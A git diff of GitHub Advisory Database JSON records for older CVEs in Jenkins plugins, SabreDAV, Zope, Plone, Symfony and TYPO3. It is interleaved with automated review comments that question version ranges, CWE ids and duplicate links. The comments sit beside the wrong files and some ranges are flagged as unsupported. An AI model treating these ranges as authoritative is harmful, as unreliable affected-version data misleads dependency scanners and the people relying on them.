+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:24:20Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json b/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json
index 765bc1b770b25..ce4771e04ce10 100644
--- a/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json
+++ b/advisories/github-reviewed/2022/05/GHSA-qg5v-jw6f-rpfj/GHSA-qg5v-jw6f-rpfj.json
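Review bot: The `summary` and the `details`/package name disagree on the product: the summary says `Jenkins Netsparker Enterprise Scan Plugin` while the details and the artifact `org.jenkins-ci.plugins:netsparker-cloud-scan` say `Netsparker Cloud Scan Plugin`. Use one name, presumably `"summary": "CSRF vulnerability in Jenkins Netsparker Cloud Scan Plugin"`, so a search on either field finds the same record. The `last_known_affected_version_range` of `<= 1.1.5` restates the `fixed: 1.1.6` range; elsewhere in this commit (GHSA-qmqw-mpqp-mr54, GHSA-r6fv-56gp-j3r4) that field is being removed once a `fixed` event exists, so the two conventions should be reconciled.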
@@ -22,10 +22,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "1.7.0"
 },
 {
- "fixed": "1.6.9"
+ "fixed": "1.7.7"
 }
 ]
 }
@@ -41,10 +41,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "1.7.0"
+ "introduced": "1.8.0"
 },
 {
- "fixed": "1.7.7"
+ "fixed": "1.8.5"
 }
 ]
 }
@@ -60,10 +60,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "1.8.0"
+ "introduced": "1.6.0"
 },
 {
- "fixed": "1.8.5"
+ "fixed": "1.6.9"
 }
 ]
 }
@@ -75,6 +75,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1939"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sabre/dav/CVE-2013-1939.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/sabre-io/dav"
@@ -82,6 +86,14 @@
 {
 "type": "WEB",
 "url": "https://groups.google.com/forum/?fromgroups=#!topic/sabredav-discuss/ehOUu7wTSGQ"
+ },
+ {
+ "type": "WEB",
+ "url": "https://groups.google.com/forum/?fromgroups=#%21topic/sabredav-discuss/ehOUu7wTSGQ"
+ },
+ {
+ "type": "WEB",
+ "url": "http://owncloud.org/about/security/advisories/oC-SA-2013-016/"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json b/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json
new file mode 100644
index 0000000000000..a5a44f71d1312
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qg7x-4h4q-3m49/GHSA-qg7x-4h4q-3m49.json
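Review bot: The three range hunks rotate the entries (the first slot becomes 1.7.0–1.7.7, the second 1.8.0–1.8.5, the third 1.6.0–1.6.9) when the only semantic change is `"introduced": "0"` → `"introduced": "1.6.0"` on the 1.6 branch; editing that one value in place would give a one-line diff and keep the entries in version order. The narrowing drops every release below 1.6.0 from the affected set; this advisory's `details` are outside the hunks, so I cannot see whether they state a lower bound — worth confirming against the FriendsOfPHP yaml added in the `@@ -75,6 +75,10 @@` hunk. The `@@ -82,6 +86,14 @@` hunk adds `https://groups.google.com/forum/?fromgroups=#%21topic/sabredav-discuss/ehOUu7wTSGQ`, which is the existing `#!topic/…` reference with the `!` percent-encoded; keep one of the two.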
@@ -0,0 +1,80 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qg7x-4h4q-3m49",
+ "modified": "2024-01-30T21:10:30Z",
+ "published": "2022-05-24T17:06:12Z",
+ "aliases": [
+ "CVE-2015-1811"
+ ],
+ "summary": "XML external entity (XXE) vulnerability in Jenkins",
+ "details": "XML external entity (XXE) vulnerability in Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via a crafted XML document.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.main:jenkins-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.597"
+ },
+ {
+ "fixed": "1.600"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.main:jenkins-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.596.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1811"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205632"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2015-02-27/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:10:30Z",
+ "nvd_published_at": "2020-01-15T19:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json b/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json
new file mode 100644
index 0000000000000..49f37d1f81ab8
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qh3m-c6hw-5hmv/GHSA-qh3m-c6hw-5hmv.json
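Review bot: `"cwe_ids": [ ]` is left empty although both the summary and the details name the weakness (`XML external entity (XXE)`), and the sibling record for CVE-2015-1809 in this same commit (GHSA-qj27-w92h-fc9r, same Jenkins advisory) carries `"CWE-611"`; add `"CWE-611"` here so the two records classify consistently. The two records also share the identical summary `XML external entity (XXE) vulnerability in Jenkins`; appending the distinguishing vector from each `details` (`via a crafted XML document` here, `via an XPath query` there) would make them distinguishable in listings.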
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qh3m-c6hw-5hmv",
+ "modified": "2024-01-30T21:14:01Z",
+ "published": "2022-05-24T17:03:47Z",
+ "aliases": [
+ "CVE-2019-16556"
+ ],
+ "summary": "Jenkins Rundeck Plugin stored credentials in plain text ",
+ "details": "Jenkins Rundeck Plugin 3.6.5 and earlier stores credentials unencrypted in its global configuration file and in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:rundeck"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.6.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.6.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16556"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1636"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:14:01Z",
+ "nvd_published_at": "2019-12-17T15:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json b/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json
new file mode 100644
index 0000000000000..d446abb4ef1cd
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qh4q-fwf8-qqrw/GHSA-qh4q-fwf8-qqrw.json
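Review bot: The new `summary` carries a trailing space inside the string, `"Jenkins Rundeck Plugin stored credentials in plain text "`, which survives into every consumer that displays or hashes the field; trim it to `"Jenkins Rundeck Plugin stored credentials in plain text"`. The summary is also in the past tense (`stored`) while the `details` and the otherwise parallel record GHSA-r5jr-82x4-r6j7 in this commit use `stores`; one tense across the Jenkins credential-storage records reads better.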
@@ -0,0 +1,101 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qh4q-fwf8-qqrw",
+ "modified": "2024-02-08T15:40:04Z",
+ "published": "2022-05-17T05:48:31Z",
+ "aliases": [
+ "CVE-2010-3198"
+ ],
+ "summary": "Zope Denial of Service (DoS) vulnerability in ZServer",
+ "details": "ZServer in Zope 2.10.x before 2.10.12 and 2.11.x before 2.11.7 allows remote attackers to cause a denial of service (crash of worker threads) via vectors that trigger uncaught exceptions.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "Zope"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.10.0"
+ },
+ {
+ "fixed": "2.10.12"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "Zope"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.11.0"
+ },
+ {
+ "fixed": "2.11.7"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3198"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/zopefoundation/Zope/commit/0f2f56f63e4a4d695ee670e02b317e900550dbac"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/zopefoundation/Zope/commit/e03a5f036d42ed2426886c9035fe018eeec65de4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugs.launchpad.net/zope2/+bug/627988"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/zopefoundation/Zope"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mail.zope.org/pipermail/zope-announce/2010-September/002247.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20200229173503/http://www.securityfocus.com/bid/42939"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.zope.org/Products/Zope/2.10.12/CHANGES.txt"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.zope.org/Products/Zope/2.11.7/CHANGES.txt"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T15:40:04Z",
+ "nvd_published_at": "2010-09-08T20:00:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json b/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json
new file mode 100644
index 0000000000000..815abec0c21f1
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qj27-w92h-fc9r/GHSA-qj27-w92h-fc9r.json
@@ -0,0 +1,80 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qj27-w92h-fc9r",
+ "modified": "2024-01-30T21:10:14Z",
+ "published": "2022-05-24T17:06:12Z",
+ "aliases": [
+ "CVE-2015-1809"
+ ],
+ "summary": "XML external entity (XXE) vulnerability in Jenkins",
+ "details": "XML external entity (XXE) vulnerability in Jenkins before 1.600 and LTS before 1.596.1 allows remote attackers to read arbitrary XML files via an XPath query.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.main:jenkins-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.597"
+ },
+ {
+ "fixed": "1.600"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.main:jenkins-core"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.596.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1809"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1205625"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2015-02-27/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-611"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:10:14Z",
+ "nvd_published_at": "2020-01-15T19:15:00Z"
+ }
+}
\ No newline at end of file
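Review bot: The PyPI package name `Zope` with ranges `2.10.0`–`2.10.12` and `2.11.0`–`2.11.7` may match no published distribution: as far as I know the `Zope` project on PyPI starts with the 4.x line, and Zope 2.10/2.11 were tarball releases (the `CHANGES.txt` references in this record point at zope.org, not PyPI), with later 2.x releases published under `Zope2`. Confirm the name and versions against the PyPI index before this record feeds a dependency scanner; if nothing matches, the `details` text is the only place where the affected versions are actually stated. `"severity": [ ]` is empty while `database_specific.severity` is `MODERATE`; that is consistent with the other pre-CVSS-v3 record in this commit (GHSA-qj7x-wm9q-qjx8), just noting it so it is read as intentional.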
diff --git a/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json b/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json
new file mode 100644
index 0000000000000..1ebf33e6ca190
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qj7x-wm9q-qjx8/GHSA-qj7x-wm9q-qjx8.json
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qj7x-wm9q-qjx8",
+ "modified": "2024-02-08T15:45:46Z",
+ "published": "2022-05-17T05:50:05Z",
+ "aliases": [
+ "CVE-2010-2422"
+ ],
+ "summary": "Plone Cross-site Scripting vulnerability in PortalTransforms",
+ "details": "Cross-site scripting (XSS) vulnerability in PortalTransforms in Plone 2.1 through 3.3.5 before hotfix 20100612 allows remote attackers to inject arbitrary web script or HTML via the safe_html transform.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "Plone"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.1"
+ },
+ {
+ "fixed": "3.3.6"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 3.3.5"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2422"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/plone/Plone"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20100728161728/http://secunia.com/advisories/40270"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20200228223808/http://www.securityfocus.com/bid/40999"
+ },
+ {
+ "type": "WEB",
+ "url": "http://plone.org/products/plone/security/advisories/cve-2010-unassigned-html-injection-in-safe_html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T15:45:46Z",
+ "nvd_published_at": "2010-06-24T12:17:00Z"
+ }
+}
\ No newline at end of file
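Review bot: `"fixed": "3.3.6"` is an inference the record does not support: the `details` say the fix is `hotfix 20100612` applied to Plone 2.1 through 3.3.5, not that 3.3.6 ships it, and none of the references on the page establishes that. If 3.3.6 is known to contain the fix, say so in `details`; otherwise a `"last_affected": "3.3.5"` event expresses exactly what is stated and makes the `last_known_affected_version_range` of `<= 3.3.5` redundant. The same PyPI-name question as the Zope record in this commit applies here: I believe Plone 2.1.x predates the `Plone` distribution on PyPI, so the lower end of the range may be unmatchable — confirm.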
diff --git a/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json b/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json
index cb5a7a4b460af..c537e527ce98a 100644
--- a/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json
+++ b/advisories/github-reviewed/2022/05/GHSA-qm4x-ch5w-gr62/GHSA-qm4x-ch5w-gr62.json
@@ -1,12 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qm4x-ch5w-gr62",
- "modified": "2023-07-07T19:42:46Z",
+ "modified": "2024-02-06T13:20:07Z",
 "published": "2022-05-17T04:42:42Z",
 "aliases": [
 "CVE-2014-2055"
 ],
- "summary": "XXE in SabreDAV before 1.7.11",
+ "summary": "XXE in SabreDAV",
 "details": "SabreDAV before 1.7.11, as used in ownCloud Server before 5.0.15 and 6.0.x before 6.0.2, allows remote attackers to read arbitrary files, cause a denial of service, or possibly have other impact via an XML External Entity (XXE) attack.",
 "severity": [
@@ -22,7 +22,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "1.6.0"
 },
 {
 "fixed": "1.7.11"
@@ -30,6 +30,25 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "sabre/dav"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.8.0"
+ },
+ {
+ "fixed": "1.8.9"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -44,6 +63,14 @@
 {
 "type": "WEB",
 "url": "https://github.com/sabre-io/dav/commit/e3f46e0ecf83cf1d2ebf54908cde7b5ec170aa2c"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/sabre/dav/CVE-2014-2055.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/fruux/sabre-dav/releases/tag/1.7.11"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json b/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json
index 7b098cc58d6b9..936e7f023246a 100644
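Review bot: After the `@@ -30,6 +30,25 @@` hunk the `affected` list covers `sabre/dav` 1.8.0 up to (not including) 1.8.9, but the `details` string still reads `SabreDAV before 1.7.11`, which a reader takes as excluding the 1.8 line; the summary was trimmed for exactly this reason, so the details should be brought in line (e.g. `SabreDAV before 1.7.11 and 1.8.x before 1.8.9`) or the new range needs a reference that names 1.8.9. The `introduced` bump from `0` to `1.6.0` in the `@@ -22,7 +22,7 @@` hunk also silently drops older releases; the FriendsOfPHP yaml added in the `@@ -44,6 +63,14 @@` hunk is presumably the source, and saying so in the commit message would help the next reviewer.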
--- a/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json
+++ b/advisories/github-reviewed/2022/05/GHSA-qmqw-mpqp-mr54/GHSA-qmqw-mpqp-mr54.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qmqw-mpqp-mr54",
- "modified": "2023-08-03T21:47:36Z",
+ "modified": "2024-02-08T19:21:57Z",
 "published": "2022-05-17T03:11:51Z",
 "aliases": [
 "CVE-2015-4050"
@@ -12,6 +12,63 @@
 ],
 "affected": [
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-kernel"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.3.19"
+ },
+ {
+ "fixed": "2.3.29"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-kernel"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.5.4"
+ },
+ {
+ "fixed": "2.5.12"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-kernel"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.6.0"
+ },
+ {
+ "fixed": "2.6.8"
+ }
+ ]
+ }
+ ]
+ },
 {
 "package": {
 "ecosystem": "Packagist",
@@ -29,10 +86,7 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 2.3.28"
- }
+ ]
 },
 {
 "package": {
@@ -44,17 +98,33 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "2.4.0"
+ "introduced": "2.4.9"
+ },
+ {
+ "last_affected": "2.4.10"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/symfony"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.5.4"
 },
 {
 "fixed": "2.5.12"
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 2.5.11"
- }
+ ]
 },
 {
 "package": {
@@ -73,10 +143,26 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 2.6.7"
- }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "symfony/http-kernel"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "2.4.9"
+ },
+ {
+ "last_affected": "2.4.10"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -84,6 +170,18 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-4050"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2015-4050.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-4050.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://symfony.com/cve-2015-4050"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20200228090443/http://www.securityfocus.com/bid/74928"
diff --git a/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json b/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json
index 0323f7f05a485..1ae80c7d1d78d 100644
--- a/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json
+++ b/advisories/github-reviewed/2022/05/GHSA-qqh2-h6gw-6x8x/GHSA-qqh2-h6gw-6x8x.json
@@ -117,10 +117,7 @@
 }
 ]
 }
- ],
- "database_specific": {
- "last_known_affected_version_range": "<= 6.2.2"
- }
+ ]
 }
 ],
 "references": [
@@ -128,6 +125,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3943"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2014-3943.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2014-001/"
+ },
 {
 "type": "WEB",
 "url": "https://web.archive.org/web/20200229060129/http://www.securityfocus.com/bid/67625"
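Review bot: The `symfony/http-kernel` 2.4 entry (`introduced: 2.4.9`, `last_affected: 2.4.10`) is appended after the `symfony/symfony` entries in the `@@ -73,10 +143,26 @@` hunk, while its three sibling `http-kernel` entries were inserted at the top of `affected` in the `@@ -12,6 +12,63 @@` hunk; grouping the four together, in branch order 2.3, 2.4, 2.5, 2.6, makes the record much easier to audit. The `last_affected: "2.4.10"` events for both packages mean any 2.4.x release above 2.4.10 would be reported as unaffected; that is right only if 2.4.10 was the final 2.4 release, which the page does not state — the `https://symfony.com/cve-2015-4050` reference added in the next hunk should be checked for that.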
@@ -147,6 +152,10 @@
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2014/06/03/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/67625"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json b/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json
new file mode 100644
index 0000000000000..bfa7eb29d01a9
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-qrh2-mh97-pw8p/GHSA-qrh2-mh97-pw8p.json
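Review bot: The added `http://www.securityfocus.com/bid/67625` duplicates the `https://web.archive.org/web/20200229060129/http://www.securityfocus.com/bid/67625` reference already present in this file (visible in the `@@ -128,6 +125,14 @@` hunk); the archived form presumably exists because the live page no longer resolves, so keeping both only adds a dead link. Drop the unarchived entry, or if plain `securityfocus.com/bid/` URLs are wanted for cross-referencing (the new Jenkins records in this commit do carry them), keep one form per id within a file. The same pairing appears in GHSA-r68f-45jg-64m6, where `https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13` is added beside its `web.archive.org` snapshot.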
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qrh2-mh97-pw8p",
+ "modified": "2024-01-30T22:25:32Z",
+ "published": "2022-05-13T01:25:43Z",
+ "aliases": [
+ "CVE-2019-1003076"
+ ],
+ "summary": "CSRF vulnerability in Jenkins Audit to Database Plugin",
+ "details": "A cross-site request forgery vulnerability in Jenkins Audit to Database Plugin in the DbAuditPublisherDescriptorImpl#doTestJdbcConnection form validation method allows attackers to initiate a connection to an attacker-specified server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:audit2db"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "0.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003076"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-977"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.securityfocus.com/bid/107790"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T22:25:32Z",
+ "nvd_published_at": "2019-04-04T16:29:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json b/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json
index b8c110293aab9..662991d2ba8de 100644
--- a/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json
+++ b/advisories/github-reviewed/2022/05/GHSA-qx76-c53f-5c7q/GHSA-qx76-c53f-5c7q.json
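Review bot: `"last_affected": "0.5"` with no `fixed` event means OSV matching stops at 0.5, so any later release of `org.jenkins-ci.plugins:audit2db` would be reported as unaffected. That is correct only if 0.5 is the latest release and the plugin was never fixed; the page does not say either, and the SECURITY-977 entry of the linked Jenkins advisory is where to confirm it. If no fix exists, the `details` should state it so a reader knows the cap means "unfixed", not "fixed in the next version". The same question applies to GHSA-r5jr-82x4-r6j7 in this commit (`com.ds.tools.hudson:crowd`, `"last_affected": "1.2"`).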
@@ -48,6 +48,10 @@
